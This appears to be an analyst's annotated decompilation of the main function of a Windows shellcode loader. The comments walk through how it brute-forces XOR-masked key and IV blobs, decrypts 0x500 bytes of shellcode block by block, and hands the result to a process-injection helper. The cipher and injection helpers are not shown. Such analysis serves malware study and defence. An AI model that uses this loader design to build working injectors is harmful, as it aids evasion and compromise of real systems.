The decompiled listing below already makes the loader's behaviour quite clear.
/*
 * Decompiled (IDA-style) entry point of a shellcode loader / injector.
 *
 * Observed flow, in order:
 *   1. sub_140002C60 fills the Process/Thread handles (the helper itself is not
 *      shown; it presumably creates or opens the target) and the IDs are printed.
 *   2. Two single-byte XOR keys are recovered by brute force (0..255) against a
 *      "hint" byte, then used to unmask a 32-byte blob at 0x1400070C0 and a
 *      16-byte blob at 0x1400070E0. The status strings call these the key and IV.
 *   3. 80 x 16 = 0x500 bytes of ciphertext at unk_1400070F0 are transformed
 *      block by block into a heap buffer, each result XORed with the previous
 *      ciphertext block (seeded with the 16-byte blob) - i.e. CBC-style
 *      chaining. The block transform lives in sub_140001C50/sub_140001FD0 and is
 *      not visible here, so the cipher is not identified from this listing.
 *   4. sub_1400027F0 hands the buffer to the target process.
 *
 * Reader notes: sub_140002790 is a printf-style wrapper whose variadic
 * arguments were dropped by the decompiler, so the values actually printed
 * (process id, thread id, pointers, GetLastError) never appear in the calls.
 * The heap buffer and both handles are never released on any path.
 *
 * Return: 0 on success, -1 on any failure (a status line is printed first).
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
unsigned int v3; // ebx
signed int i; // edi
__m128 si128; // xmm3
_DWORD *v7; // rax
unsigned int v8; // edx
__m128i v9; // xmm0
__m128i v10; // xmm0
unsigned int v11; // ecx
__m128 v12; // xmm0
signed int j; // edi
_DWORD *v14; // rax
__m128i v15; // xmm0
__m128i v16; // xmm0
unsigned int v17; // ecx
__m128 v18; // xmm0
HANDLE ProcessHeap; // rax
__m128i *v20; // r15
__int64 v21; // rdx
__m128i *v22; // rdi
__int128 *v23; // rsi
signed __int64 v24; // rbx
unsigned __int64 v25; // rbp
__int64 v26; // r14
__int128 v27; // xmm6
__m128i *v28; // rax
__int64 v29; // r8
__int64 v30; // [rsp+30h] [rbp-168h] BYREF
__m128i v31; // [rsp+40h] [rbp-158h]
HANDLE Process; // [rsp+50h] [rbp-148h] BYREF
HANDLE Thread; // [rsp+58h] [rbp-140h] BYREF
__int128 v34[16]; // [rsp+60h] [rbp-138h] BYREF
// v3 is the byte counter of the second (16-byte) unmask loop; the first loop
// uses v8. Process/Thread are out-parameters of the first helper; v30 is the
// out-parameter of the injector and is printed as the remote address.
v3 = 0;
Process = 0i64;
Thread = 0i64;
v30 = 0i64;
// Obtain the target handles. A zero return is treated as failure. The
// reinterpreting cast on argc is a decompiler artefact, not real behaviour.
if ( !(unsigned int)sub_140002C60(*(__int64 *)&argc, (__int64)argv, (__int64)&Process, (__int64)&Thread) )
return -1;
// The GetProcessId/GetThreadId results look discarded only because the
// decompiler dropped the wrapper's variadic arguments; presumably they are
// what the %d in each format string prints.
GetProcessId(Process);
sub_140002790("[+] Process ID: %d \n");
GetThreadId(Thread);
sub_140002790("[+] Thread ID: %d\n");
sub_140002790("[+] Delaying Execution and Decrypting Keys ... \n");
// Brute-force the single-byte XOR key of the key blob: try every byte i until
// (i ^ hint) % 255 equals the hard-coded 0xE2, the hint being the byte at
// 0x1400070C1. This search is the "delaying execution" step announced above.
// If nothing matches, the loop ends with i == 256, whose low byte is 0 (see
// the (_BYTE)i test further down).
for ( i = 0; i <= 255; ++i )
{
if ( (i ^ (unsigned __int8)byte_1400070C1) % 255 == 0xE2 )
break;
}
// Build a 32-bit value with the recovered key byte replicated in each byte
// lane: broadcast i to all lanes, mask with the constant at xmmword_1400059C0
// (presumably 0xFF per lane - the constant is not visible here), then pack
// down to bytes twice. Only the low dword (v11) is used afterwards.
si128 = (__m128)_mm_load_si128((const __m128i *)&xmmword_1400059C0);
v7 = &unk_1400070C4;
v8 = 0;
v9 = (__m128i)_mm_and_ps((__m128)_mm_shuffle_epi32(_mm_cvtsi32_si128(i), 0), si128);
v10 = _mm_packus_epi16(v9, v9);
v31 = _mm_packus_epi16(v10, v10);
v11 = v31.m128i_i32[0];
// Unmask the 32-byte blob starting one dword before unk_1400070C4 (0x1400070C0)
// by XORing it dword by dword with v11: two passes of 16 bytes (v8 runs to
// 0x20). The hint byte at 0x1400070C1 lies inside this range and is rewritten
// too. The cvtsi32/xor_ps/cvtsi128 sequence is just a scalar XOR that the
// compiler routed through XMM registers.
do
{
v12 = (__m128)_mm_cvtsi32_si128(*(v7 - 1));
v7 += 4;
v8 += 16;
*(v7 - 5) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps((__m128)_mm_cvtsi32_si128(v11), v12));
*(v7 - 4) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
(__m128)_mm_cvtsi32_si128(*(v7 - 4)),
(__m128)_mm_cvtsi32_si128(v11)));
*(v7 - 3) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
(__m128)_mm_cvtsi32_si128(v11),
(__m128)_mm_cvtsi32_si128(*(v7 - 3))));
*(v7 - 2) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
(__m128)_mm_cvtsi32_si128(v11),
(__m128)_mm_cvtsi32_si128(*(v7 - 2))));
}
while ( v8 < 0x20 );
// "Key found" is tested as "low byte of i is non-zero". That correctly catches
// an exhausted search (i == 256) but also rejects a legitimate key byte 0x00.
if ( (_BYTE)i )
{
// Same brute force for the second blob: hint byte at 0x1400070E1, target 0xAE.
for ( j = 0; j <= 255; ++j )
{
if ( (j ^ (unsigned __int8)byte_1400070E1) % 255 == 0xAE )
break;
}
// Replicate j into four byte lanes exactly as was done for i above.
v14 = &unk_1400070E4;
v15 = (__m128i)_mm_and_ps((__m128)_mm_shuffle_epi32(_mm_cvtsi32_si128(j), 0), si128);
v16 = _mm_packus_epi16(v15, v15);
v31 = _mm_packus_epi16(v16, v16);
v17 = v31.m128i_i32[0];
// Unmask the 16 bytes at 0x1400070E0 (one dword before unk_1400070E4) in a
// single pass (v3 runs to 0x10). The status strings call this blob the IV.
do
{
v18 = (__m128)_mm_cvtsi32_si128(*(v14 - 1));
v14 += 4;
v3 += 16;
*(v14 - 5) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps((__m128)_mm_cvtsi32_si128(v17), v18));
*(v14 - 4) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
(__m128)_mm_cvtsi32_si128(v17),
(__m128)_mm_cvtsi32_si128(*(v14 - 4))));
*(v14 - 3) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
(__m128)_mm_cvtsi32_si128(v17),
(__m128)_mm_cvtsi32_si128(*(v14 - 3))));
*(v14 - 2) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
(__m128)_mm_cvtsi32_si128(v17),
(__m128)_mm_cvtsi32_si128(*(v14 - 2))));
}
while ( v3 < 0x10 );
// Same caveat as for i: a key byte of 0x00 is indistinguishable from "not found".
if ( (_BYTE)j )
{
sub_140002790("[+] Done with Decryption\n");
// v34 is a 256-byte buffer the two helpers below use as their cipher context;
// it is zeroed here and again after the allocation (redundant, harmless).
memset(v34, 0, sizeof(v34));
// Output buffer for the 0x500 bytes of plaintext, flags 8 == HEAP_ZERO_MEMORY.
ProcessHeap = GetProcessHeap();
v20 = (__m128i *)HeapAlloc(ProcessHeap, 8u, 0x500ui64);
if ( v20 )
{
memset(v34, 0, sizeof(v34));
// Initialise the context (sub_140001C50 is not shown; presumably it expands
// the 32-byte key unmasked above - confirm in that function).
sub_140001C50((__int64)v34);
// v22 walks the output buffer, v23 walks the ciphertext at unk_1400070F0,
// v26 counts 80 blocks of 16 bytes (= 0x500). v34[15] is seeded with the
// 16-byte blob at unk_1400070E0 and from then on holds the previous
// ciphertext block (the chaining value). v24 is the byte distance from the
// output cursor to v34[15] and v25 the address of the last byte of the current
// output block (8 + 7 past its start); both only feed the alias test below.
v22 = v20;
v23 = (__int128 *)&unk_1400070F0;
v24 = (char *)&v34[15] - (char *)v20;
v34[15] = unk_1400070E0;
v25 = (unsigned __int64)&v20->m128i_u64[1] + 7;
v26 = 80i64;
do
{
// Save the ciphertext block before it is consumed; it becomes the chaining
// value for the next block.
v27 = *v23;
// Block transform into the output slot (sub_140001FD0 is not shown). v21 is
// uninitialised on the first call in this listing - decompiler artefact; the
// real second argument cannot be recovered from here.
sub_140001FD0(v34, v21, v22, v23);
// XOR the transformed block with the previous ciphertext block (CBC-style
// chaining). The if/else only chooses between a 16-byte vector XOR, when the
// output block cannot overlap v34[15], and a byte loop otherwise; both
// compute the same result.
if ( v22 > (__m128i *)((char *)&v34[15] + 15) || v25 < (unsigned __int64)&v34[15] )
{
*(__m128 *)v22 = _mm_xor_ps((__m128)_mm_loadu_si128(v22), (__m128)v34[15]);
}
else
{
v28 = v22;
v21 = 16i64;
do
{
// byte at v28 ^= byte at (v28 + v24) == corresponding byte of v34[15]
v28->m128i_i8[0] ^= v28->m128i_u8[v24];
v28 = (__m128i *)((char *)v28 + 1);
--v21;
}
while ( v21 );
}
++v22;
v34[15] = v27;
v25 += 16i64;
v24 -= 16i64;
++v23;
--v26;
}
while ( v26 );
// Printed after the loop has finished; the %p argument was dropped by the
// decompiler (presumably v20).
sub_140002790("[i] Decrypting shellcode at: 0x%p \n");
// Hand the plaintext buffer to the injector (sub_1400027F0, not shown). v29 is
// uninitialised in this listing - decompiler artefact, presumably the length
// 0x500. v30 is filled by the helper and printed as the remote address.
// v20 and the two handles are not freed/closed on either path.
if ( (unsigned int)sub_1400027F0(Process, v20, v29, &v30) )
{
sub_140002790("[+] Payload is injected at: 0x%p \n");
sub_140002790("[+] SUCCESSFULL PAYLOAD LAUNCH!!!!");
return 0;
}
else
{
puts("[-] ERROR INJECTING PAYLOAD, PLEASE TRY AGAIN!");
return -1;
}
}
else
{
// HeapAlloc returned NULL; the GetLastError value is the dropped %d argument.
GetLastError();
sub_140002790("[!] HeapAlloc Failed With Error: %d \n");
puts("[-] COULD NOT DECRYPT THE SHELLCODE, PLEASE TRY AGAIN!");
return -1;
}
}
else
{
// Reached when the second brute force found no j (or found j == 0).
puts("[-] COULD NOT DECRYPT THE IV, PLEASE TRY AGAIN!");
return -1;
}
}
else
{
// Reached when the first brute force found no i (or found i == 0).
puts("[-] COULD NOT DECRYPT THE KEY, PLEASE TRY AGAIN!");
return -1;
}
} |